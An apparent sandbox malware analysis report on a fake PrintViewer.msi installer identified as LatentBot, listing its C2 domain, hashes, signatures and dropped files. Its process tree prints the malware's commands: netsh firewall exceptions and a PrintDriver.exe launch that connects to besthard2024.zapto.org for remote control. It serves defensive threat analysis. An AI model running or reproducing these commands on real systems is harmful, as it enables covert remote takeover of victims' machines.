Analysis

  • max time kernel
    148s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    30-09-2024 05:14

General

  • Target

    PrintViewer.msi

  • Size

    6.7MB

  • MD5

    85f914ec316e8d20e8e13ef3719e04e4

  • SHA1

    86ec276d409525bd8c1ef6d47ec8eece7639c0a2

  • SHA256

    00ceea629efd7eb1d9eee5706ce8089336259c099fc4af274baf857bd1ddf230

  • SHA512

    6a9eebfd6b4e794ab1fd949fa2093559460390a1d7843484e2086145e2ae968d8c347a3b3392aab2ebc41463cf97a3d36b23b6e8f80000949bb66c8eff3ba4e6

  • SSDEEP

    98304:57vB+ZHiEZJMuI9JqwLOO+lzsnMHDqqxLSd7qqXR2EkLus6elw5Xe21NtcP33h3u:5IiiJiTqwLOTsMHDHBAI8kcXvWP1u

Malware Config

Extracted

Family

latentbot

C2

besthard2024.zapto.org

Signatures

  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

  • Blocklisted process makes network request 2 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Drops file in Windows directory 10 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 11 IoCs
  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Kills process with taskkill 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\PrintViewer.msi
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2408
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2640
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding ADA8D974B6F80E4224326E81035663D4
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2516
    • C:\Windows\Installer\MSI98CF.tmp
      "C:\Windows\Installer\MSI98CF.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1556
  • C:\Games\PrintDrivers.exe
    "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
    1⤵
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:1148
  • C:\Windows\system32\cmd.exe
    cmd /c ""C:\Games\PrintDrivers.cmd" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Windows\system32\mode.com
      Mode 90,20
      2⤵
      PID:2100
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
      2⤵
      PID:480
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:780
      • C:\Windows\system32\reg.exe
        Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
        3⤵
        PID:592
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic process where (name="PrintDriver.exe") get commandline
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1224
    • C:\Windows\system32\findstr.exe
      findstr /i "PrintDriver.exe"
      2⤵
      PID:1732
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
      2⤵
      PID:2336
    • C:\Windows\system32\cmd.exe
      cmd
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1708
      • C:\Windows\system32\mode.com
        Mode 90,20
        3⤵
        PID:908
      • C:\Windows\system32\netsh.exe
        netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:1784
      • C:\Windows\system32\netsh.exe
        netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:1520
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic process where (name="PrintDriver.exe") get commandline
        3⤵
        PID:2452
      • C:\Windows\system32\findstr.exe
        findstr /i "PrintDriver.exe"
        3⤵
        PID:1444
      • C:\Games\PrintDriver.exe
        C:\Games\PrintDriver.exe -autoreconnect ID:5654907 -connect besthard2024.zapto.org:5500 -run
        3⤵
        • Executes dropped EXE
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2308
    • C:\Windows\system32\timeout.exe
      timeout /t 1
      2⤵
      • Delays execution with timeout.exe
      PID:2692
    • C:\Windows\system32\taskkill.exe
      taskkill /im rundll32.exe /f
      2⤵
      • Kills process with taskkill
      PID:1984
    • C:\Windows\system32\timeout.exe
      timeout /t 1
      2⤵
      • Delays execution with timeout.exe
      PID:1936
    • C:\Windows\system32\taskkill.exe
      taskkill /im rundll32.exe /f
      2⤵
      • Kills process with taskkill
      PID:2396
    • C:\Windows\system32\timeout.exe
      timeout /t 1
      2⤵
      • Delays execution with timeout.exe
      PID:2016
    • C:\Windows\system32\taskkill.exe
      taskkill /im rundll32.exe /f
      2⤵
      • Kills process with taskkill
      PID:1792
    • C:\Games\PrintDrivers.exe
      C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:2180
  • C:\Windows\system32\cmd.exe
    cmd /c ""C:\Games\driverhelp.cmd" "
    1⤵
    PID:2888
    • C:\Windows\system32\mode.com
      Mode 90,20
      2⤵
      PID:2768
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
      2⤵
      PID:2716
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
      2⤵
      PID:2720
      • C:\Windows\system32\reg.exe
        Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
        3⤵
        PID:3044
    • C:\Windows\system32\timeout.exe
      timeout /t 20
      2⤵
      • Delays execution with timeout.exe
      PID:2900
    • C:\Windows\system32\timeout.exe
      timeout /t 20
      2⤵
      • Delays execution with timeout.exe
      PID:2164
    • C:\Windows\system32\timeout.exe
      timeout /t 20
      2⤵
      • Delays execution with timeout.exe
      PID:2924
    • C:\Windows\system32\timeout.exe
      timeout /t 20
      2⤵
      • Delays execution with timeout.exe
      PID:1680
    • C:\Windows\system32\timeout.exe
      timeout /t 20
      2⤵
      • Delays execution with timeout.exe
      PID:2868
    • C:\Windows\system32\timeout.exe
      timeout /t 20
      2⤵
      • Delays execution with timeout.exe
      PID:812
    • C:\Windows\system32\timeout.exe
      timeout /t 20
      2⤵
      • Delays execution with timeout.exe
      PID:1224
    • C:\Windows\system32\timeout.exe
      timeout /t 20
      2⤵
      • Delays execution with timeout.exe
      PID:1856

Network

  • DNS lookup (us)
    Domain: besthard2024.zapto.org
    Process: PrintDriver.exe
    Remote address: 8.8.8.8:53
    Request: besthard2024.zapto.org IN A
    Response: besthard2024.zapto.org IN A 94.156.69.75
  • 94.156.69.75:5500
    Domain: besthard2024.zapto.org
    Process: PrintDriver.exe
    1.1kB
    820 B
    18
    16
  • 127.0.0.1:5900
    Process: PrintDriver.exe
  • 8.8.8.8:53
    Domain: besthard2024.zapto.org
    Protocol: dns
    Process: PrintDriver.exe
    68 B
    84 B
    1
    1
    DNS Request: besthard2024.zapto.org
    DNS Response: 94.156.69.75

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Config.Msi\f769477.rbs
    Filesize: 418KB
    MD5: 3ecf294845d5ae5b8306603ba36cb2aa
    SHA1: 859aae412a10427674364bd7858ff71ae4949292
    SHA256: e3fc4f644a99902e59a0365749f4fc6edd36d98069abc650db5e252edd716099
    SHA512: 632bc982d12890539d8ac3bf6c46f8674ab57eded2e8d16d5521bf4dded360979297007aa61d4e3d9dafde76fa06bc8d361ee527c3d9276bea51e3b47c87beb8

  • C:\Games\PrintDriver.exe
    Filesize: 2.8MB
    MD5: 27c1c264c6fce4a5f44419f1783db8e0
    SHA1: e071486e4dfef3a13f958a252d7000d3ce7bfd89
    SHA256: 29379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db
    SHA512: a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98

  • C:\Games\PrintDriver.txt
    Filesize: 1KB
    MD5: 6eb13f7936a83f4c44842029914aad6e
    SHA1: 7b9b27731d4ca6f996ce68c5d68b4d653e31d915
    SHA256: 8d9bb49947d9dc7fa7be7310149a99f13a0c02580fd996aae31c69d673775c49
    SHA512: 227788193867b2f99a62ae792d91562ad46ea3fa0855cf6ef28fc0de31d43f2e671c6ef50e534f0235f1f663769715bef162913a554e86e581fe05455373623e

  • C:\Games\PrintDrivers.cmd
    Filesize: 1KB
    MD5: eacc690f71a77685f030bef23b506b91
    SHA1: 03b911ba997d44028bf515ea44fe4813b4b4a785
    SHA256: 0f1d30740f2e46b22b86fb01acdabbd02440d7dbebe963a405fb3a5661b23263
    SHA512: 9870aa4dc699b74bfc8fb53df0c74686913f42ea2321bee39786e5be696fb081e3dfdac1b312f3c439c14e3061f35cefe820ef1ac5c853274ca0c867bf50a54d

  • C:\Games\PrintDrivers.exe
    Filesize: 403KB
    MD5: 29ed7d64ce8003c0139cccb04d9af7f0
    SHA1: 8172071a639681934d3dc77189eb88a04c8bcfac
    SHA256: e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f
    SHA512: 4bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415

  • C:\Games\UltraVNC.ini
    Filesize: 1KB
    MD5: b9dfbea744cc6c65473a97f2b959e44c
    SHA1: c022f1d97fa56d61ad935aafa4e9e59e611e746a
    SHA256: 6f95a4eff9b0c2eaf37104b323d2b09c037aa7c3d472a1887c0f7914aa6c835d
    SHA512: b92c8ea3583eb87f365b96cd45562cac2c4343e281c5090fc00db3f03bb5538a2d8aea3c39449d8d79cad31ed3692f6045266811d50fdd69807d8b12a9649eb5

  • C:\Games\driverhelp.cmd
    Filesize: 870B
    MD5: fd3b5847ddb8a31413951c0aa870ab95
    SHA1: e3e91e3e9fa442cd1937422120de91da87973ddb
    SHA256: e4f5e16dfe9bbe6d63f266103c35c0035a2d4014f516420190b7cfafb02b08ad
    SHA512: 5d8599f7d6f0824ab30118f5680bf89d28c1e7e9de4ed61af9074cb9d339619d59dab8e5818dc93dcf5b27ad9e8a863c5d082f8f829aa8c4a026ec5da2454096

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 342B
    MD5: 0b247832df683c0af895edaf33cd9d35
    SHA1: 21c7e24b5058f3334f40cb1c657916b57e5c0e47
    SHA256: e4edee729915142ab0fd4a4f9711a140fe2d40e47843043ecc39c977dd4bba49
    SHA512: f252c81a96ad46f449794542bddd46ffeae225465c41365b3e9ad8c98115844aa3f041795515f24ebced83b39ffa03c056a9da57a0ef2603fb0c2b7633351cbc

  • C:\Users\Admin\AppData\Local\Temp\Cab937B.tmp
    Filesize: 70KB
    MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
    SHA1: 1723be06719828dda65ad804298d0431f6aff976
    SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
    SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar939D.tmp
    Filesize: 181KB
    MD5: 4ea6026cf93ec6338144661bf1202cd1
    SHA1: a1dec9044f750ad887935a01430bf49322fbdcb7
    SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
    SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Windows\Installer\MSI968B.tmp
    Filesize: 936KB
    MD5: 13056f6fc48a93c1268d690e554f4571
    SHA1: b83de3638e8551a315bb51703762a9820a7e0688
    SHA256: aeda49baf2d79da2f7a9266f1fb7884111c2620e187090321f5278af5131c996
    SHA512: ca828b4248e399178a8614f941332d159a30bad0156df0d5f4c4ca9d74d0ccb61fac59f34c945f5f914e22ec639bd97718f76d21b452825b07fe4041d1a44824

  • C:\Windows\Installer\MSI98CF.tmp
    Filesize: 413KB
    MD5: c8311ded7db427ce2c2879558ce8a8c1
    SHA1: 1895ce48297025dc005ebebc8256ac6d62013dec
    SHA256: 6fc76509f00c8ac81b597feeab520e684d190d831d828ca318d1e54afbf4a193
    SHA512: d293885ef98f4e3fd9794500b8d560354cec3227916df05027f8c311076c60f11b6857e4e0ab0618f4d42da8141b42bcfb829a3a43b29a73ce0aa9967a80a232

  • memory/1148-120-0x00000000000B0000-0x00000000000B2000-memory.dmp
    Filesize: 8KB

  • memory/1556-118-0x0000000000120000-0x0000000000122000-memory.dmp
    Filesize: 8KB

  • memory/1960-172-0x00000000024A0000-0x00000000024B0000-memory.dmp
    Filesize: 64KB

  • memory/2180-187-0x00000000003E0000-0x00000000003E2000-memory.dmp
    Filesize: 8KB
